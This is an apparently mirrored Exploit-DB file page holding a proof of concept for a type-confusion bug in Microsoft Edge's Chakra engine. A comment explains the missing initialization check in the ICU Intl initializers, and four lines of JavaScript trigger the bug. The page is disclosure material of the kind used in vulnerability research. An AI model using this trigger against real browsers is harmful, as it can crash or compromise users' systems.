bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/windows/dos/45217.js
Offensive Security 16744756bc DB: 2018-08-18 
10 changes to exploits/shellcodes

TP-Link WR840N 0.9.1 3.16 - Denial of Service (PoC)
CEWE Photoshow 6.3.4 - Denial of Service (PoC)
Microsoft Edge Chakra JIT - ImplicitCallFlags Check Bypass with Intl
Microsoft Edge Chakra JIT - Scope Parsing Type Confusion
Microsoft Edge Chakra JIT - 'DictionaryPropertyDescriptor::CopyFrom' Type Confusion
Microsoft Edge Chakra JIT - 'InlineArrayPush' Type Confusion
Microsoft Edge Chakra JIT - InitializeNumberFormat and InitializeDateTimeFormat Type Confusion

OpenSSH 2.3 < 7.4 - Username Enumeration (PoC)

Mikrotik WinBox 6.42 - Credential Disclosure (golang)

Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)

Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection
WordPress Plugin Export Users to CSV 1.1.1 - CSV Injection

ADM 3.1.2RHG1 - Remote Code Execution
2018-08-18 05:01:47 +00:00

18 lines
No EOL
1.1 KiB
JavaScript
Raw Blame History

/*
The InitializeNumberFormat function in Intl.js is used to initialize an Intl.NumberFormat object, and InitializeDateTimeFormat is used for an Intl.DateTimeFormat object. There are two versions of each initializer. One is for WinGlob and the other is for ICU. The problem is that the versions for ICU don't check whether the given object has been initialized. This allows to initialize the same object multiple times which can lead to type confusion.
It seems the recent version of Edge in Windows Insider Preview has started to use ICU. Tested on Microsoft Edge 42.17672.1000.0 and Microsoft EdgeHTML 17.17672.
The initializer for ICU has no check:
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L1151
The initializer for WinGlob has a check:
https://github.com/Microsoft/ChakraCore/blob/bc2e55a7d80338ee4c9c63b76893f6d816dfe70b/lib/Runtime/Library/InJavascript/Intl.js#L3046
PoC:
*/
let object = {};
Intl.NumberFormat.apply(object);
Intl.DateTimeFormat.apply(object);
Intl.DateTimeFormat.prototype.formatToParts.apply(object);
Reference in a new issue View git blame Copy permalink